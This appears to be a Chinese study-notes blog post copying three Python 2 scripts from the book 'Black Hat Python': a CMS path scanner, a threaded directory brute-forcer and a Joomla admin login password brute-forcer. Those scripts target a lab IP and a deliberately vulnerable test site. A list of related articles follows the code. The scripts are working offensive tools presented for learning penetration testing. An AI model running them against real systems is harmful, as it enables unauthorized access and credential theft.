开源Web应用目录扫描器

这里的前提是Web服务器使用的是开源CMS来建站的,而且自己也下载了一套相应的开源代码,感觉意义并不大

#!/usr/bin/python

#coding=utf-8

import Queue

import threading

import os

import urllib2

threads = 10

target = "http://10.10.10.144/dunling"

directory = "/dunling"

filters = [".jpg",".gif",".png",".css"]

os.chdir(directory)

web_paths = Queue.Queue()

for r,d,f in os.walk("."):

    for files in f:

        remote_path = "%s/%s"%(r,files)

        if remote_path.startswith("."):

            remote_path = remote_path[1:]

        if os.path.splitext(files)[1] not in filters:

            web_paths.put(remote_path)

def test_remote():

    while not web_paths.empty():

        path = web_paths.get()

        url = "%s%s"%(target,path)

        request = urllib2.Request(url)

        try:

            response = urllib2.urlopen(request)

            content = response.read()

            print "[%d] => %s"%(response.code,path)

            response.close()

        except urllib2.HTTPError as error:

            # print "Failed %s"%error.code

            pass

for i in range(threads):

    print "Spawning thread : %d"%i

    t = threading.Thread(target=test_remote)

    t.start()

暴力破解目录和文件位置

#!/usr/bin/python

#coding=utf-8

import urllib2

import threading

import Queue

import urllib

threads = 50

target_url = "http://testphp.vulnweb.com"

wordlist_file = "/tmp/all.txt" # from SVNDigger

resume = None

user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"

def build_wordlist(wordlist_file):

    #读入字典文件

    fd = open(wordlist_file,"rb")

    raw_words = fd.readlines()

    fd.close()

    found_resume = False

    words = Queue.Queue()

    for word in raw_words:

        word = word.rstrip()

        if resume is not None:

            if found_resume:

                words.put(word)

            else:

                if word == resume:

                    found_resume = True

                    print "Resuming wordlist from: %s"%resume

        else:

            words.put(word)

    return words

def dir_bruter(word_queue,extensions=None):

    while not word_queue.empty():

        attempt = word_queue.get()

        attempt_list = []

        #检测是否有文件扩展名,若没有则就是要暴力破解的路径

        if "." not in attempt:

            attempt_list.append("/%s/"%attempt)

        else:

            attempt_list.append("/%s"%attempt)

        #如果我们想暴破扩展

        if extensions:

            for extension in extensions:

                attempt_list.append("/%s%s"%(attempt,extension))

        #迭代我们要尝试的文件列表

        for brute in attempt_list:

            url = "%s%s"%(target_url,urllib.quote(brute))

            try:

                headers = {}

                headers["User-Agent"] = user_agent

                r = urllib2.Request(url,headers=headers)

                response = urllib2.urlopen(r)

                if len(response.read()):

                    print "[%d] => %s"%(response.code,url)

            except urllib2.URLError, e:

                if hasattr(e,'code') and e.code != 404:

                    print "!!! %d => %s"%(e.code,url)

                pass

word_queue = build_wordlist(wordlist_file)

extensions = [".php",".bak",".orig",".inc"]

for i in range(threads):

    t = threading.Thread(target=dir_bruter,args=(word_queue,extensions,))

    t.start()

暴力破解HTML表格认证

1、检索登录页面,接受所有返回的cookies值;

2、从HTML中获取所有表单元素;

3、在你的字典中设置需要猜测的用户名和密码;

4、发送HTTP POST数据包到登录处理脚本,数据包含所有的HTML表单文件和存储的cookies值;

5、测试是否能登录成功。

#!/usr/bin/python

#coding=utf-8

import urllib2

import urllib

import cookielib

import threading

import sys

import Queue

from HTMLParser import HTMLParser

#简要设置

user_thread = 10

username = "admin"

wordlist_file = "/tmp/passwd.txt"

resume = None

#特定目标设置

target_url = "http://10.10.10.144/Joomla/administrator/index.php"

target_post = "http://10.10.10.144/Joomla/administrator/index.php"

username_field = "username"

password_field = "passwd"

success_check = "Administration - Control Panel"

class Bruter(object):

    """docstring for Bruter"""

    def __init__(self, username, words):

        self.username = username

        self.password_q = words

        self.found = False

        print "Finished setting up for: %s"%username

    def run_bruteforce(self):

        for i in range(user_thread):

            t = threading.Thread(target=self.web_bruter)

            t.start()

    def web_bruter(self):

        while not self.password_q.empty() and not self.found:

            brute = self.password_q.get().rstrip()

            jar = cookielib.FileCookieJar("cookies")

            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))

            response = opener.open(target_url)

            page = response.read()

            print "Trying: %s : %s (%d left)"%(self.username,brute,self.password_q.qsize())

            #解析隐藏区域

            parser = BruteParser()

            parser.feed(page)

            post_tags = parser.tag_results

            #添加我们的用户名和密码区域

            post_tags[username_field] = self.username

            post_tags[password_field] = brute

            login_data = urllib.urlencode(post_tags)

            login_response = opener.open(target_post,login_data)

            login_result = login_response.read()

            if success_check in login_result:

                self.found = True

                print "[*] Bruteforce successful. "

                print "[*] Username: %s"%self.username

                print "[*] Password: %s"%brute

                print "[*] Waiting for other threads to exit ... "

class BruteParser(HTMLParser):

    """docstring for BruteParser"""

    def __init__(self):

        HTMLParser.__init__(self)

        self.tag_results = {}

    def handle_starttag(self,tag,attrs):

        if tag == "input":

            tag_name = None

            tag_value = None

            for name,value in attrs:

                if name == "name":

                    tag_name = value

                if name == "value":

                    tag_value = value

                if tag_name is not None:

                    self.tag_results[tag_name] = value

def build_wordlist(wordlist_file):

    fd = open(wordlist_file,"rb")

    raw_words = fd.readlines()

    fd.close()

    found_resume = False

    words = Queue.Queue()

    for word in raw_words:

        word = word.rstrip()

        if resume is not None:

            if found_resume:

                words.put(word)

            else:

                if word == resume:

                    found_resume = True

                    print "Resuming wordlist from: %s"%resume

        else:

            words.put(word)

    return words

words = build_wordlist(wordlist_file)

brute_obj = Bruter(username,words)

brute_obj.run_bruteforce()

《Python黑帽子:黑客与渗透测试编程之道》 Web攻击的更多相关文章

  1. python黑帽子-黑客与渗透测试编程之道(源代码)

    链接: https://pan.baidu.com/s/1i5BnB5V   密码: ak9t

  2. 读书笔记 ~ Python黑帽子 黑客与渗透测试编程之道

    Python黑帽子  黑客与渗透测试编程之道   <<< 持续更新中>>> 第一章: 设置python 环境 1.python软件包管理工具安装 root@star ...

  3. 2017-2018-2 20179204 PYTHON黑帽子 黑客与渗透测试编程之道

    python代码见码云:20179204_gege 参考博客Python黑帽子--黑客与渗透测试编程之道.关于<Python黑帽子:黑客与渗透测试编程之道>的学习笔记 第2章 网络基础 t ...

  4. 《Python黑帽子:黑客与渗透测试编程之道》 扩展Burp代理

    下载jython,在Burpsuite的扩展中配置jython路径: Burp模糊测试: #!/usr/bin/python #coding=utf-8 # 导入三个类,其中IBurpExtender ...

  5. 《Python黑帽子:黑客与渗透测试编程之道》 Scapy:网络的掌控者

    窃取email认证: 测试代码: #!/usr/bin/python #coding=utf-8 from scapy.all import * #数据包回调函数 def packet_callbac ...

  6. 《Python黑帽子:黑客与渗透测试编程之道》 网络基础

    TCP客户端: 示例中socket对象有两个参数,AF_INET参数表明使用IPv4地址或主机名 SOCK_STREAM参数表示是一个TCP客户端.访问的URL是百度. #coding=utf-8 i ...

  7. 《Python黑帽子:黑客与渗透测试编程之道》 玩转浏览器

    基于浏览器的中间人攻击: #coding=utf-8 import win32com.client import time import urlparse import urllib data_rec ...

  8. 《Python黑帽子:黑客与渗透测试编程之道》 Windows下木马的常用功能

    有趣的键盘记录: 安装pyHook: http://nchc.dl.sourceforge.net/project/pyhook/pyhook/1.5.1/pyHook-1.5.1.win32-py2 ...

  9. 《Python黑帽子:黑客与渗透测试编程之道》 基于GitHub的命令和控制

    GitHub账号设置: 这部分按书上来敲命令即可,当然首先要注册一个GitHub账号还有之前安装的GitHub API库(pip install github3.py),这里就只列一下命令吧: mkd ...

随机推荐

  1. 骗分大法之-----分块||迷之线段树例题a

    什么是分块呢? 就是一种可以帮你骗到不少分的神奇的算法. 分块的写法有几种,我所知道的有①预处理②不预处理 不预处理的代码我看得一脸懵逼 所以我在这里就谈一下预处理的版本www 首先看一道题: 给定一 ...

  2. phpstrom+xdebug配置

    1.确认是否安装了xdebug 2.在php.ini文件中配置如下 [xdebug] zend_extension="D:\wamp\php-5.6.2-x64\ext\php_xdebug ...

  3. cubieboard安装小记

    1.1.使用ttl线 ttl线驱动程序:PL2303_Prolific_DriverInstaller_v1.7.0.exe(驱动精灵上下载) ttl终端:http://the.earth.li/~s ...

  4. 创建WRAPPER时, SQL20076N 未对指定的操作启用数据库的实例。

    您可以通过运行DB2 UPDATE DBM CFG USING FEDERATED YES来设置这个参数.修改这个参数后,必须重新启动实例才会生效(DB2STOP/DB2START).所以你会出现你的 ...

  5. sci-hub 下载地址更新

    #  2017-12-14 可用 http://www.sci-hub.tw/ 文献共享平台

  6. crontab误删除

    命令如下: cat /var/log/cron* | grep -i "`which cron`" > ./all_temp cat ./all_temp | grep -v ...

  7. android 蓝牙通讯编程 备忘

    1.启动App后: 判断->蓝牙是否打开(所有功能必须在打牙打开的情况下才能用) 已打开: 启动代码中的蓝牙通讯Service 未打开: 发布 打开蓝牙意图(系统),根据Activity返回进场 ...

  8. flask_hello world

    对于flask框架的学习全部借鉴于http://www.pythondoc.com/flask-mega-tutorial/index.html 在学习的过程中,我使用的是Pycharm IDE,Py ...

  9. 记一次web服务模块开发过程

    一.前言 之前在分析WCS系统的过程中,也赶上要开发其中的一个模块,用于和AGV系统对接完成一些取货.配盘等任务:在这里将这次模块开发的全过程记录一下,以便自己以后开发时能够更加快速的明白流程. 二. ...

  10. not allowed to access to crontab because of pam configuration

    如果运行crontab如遇下面这样的错误: $ crontab -l You (zhangsan) are not allowed to access to (crontab) because of ...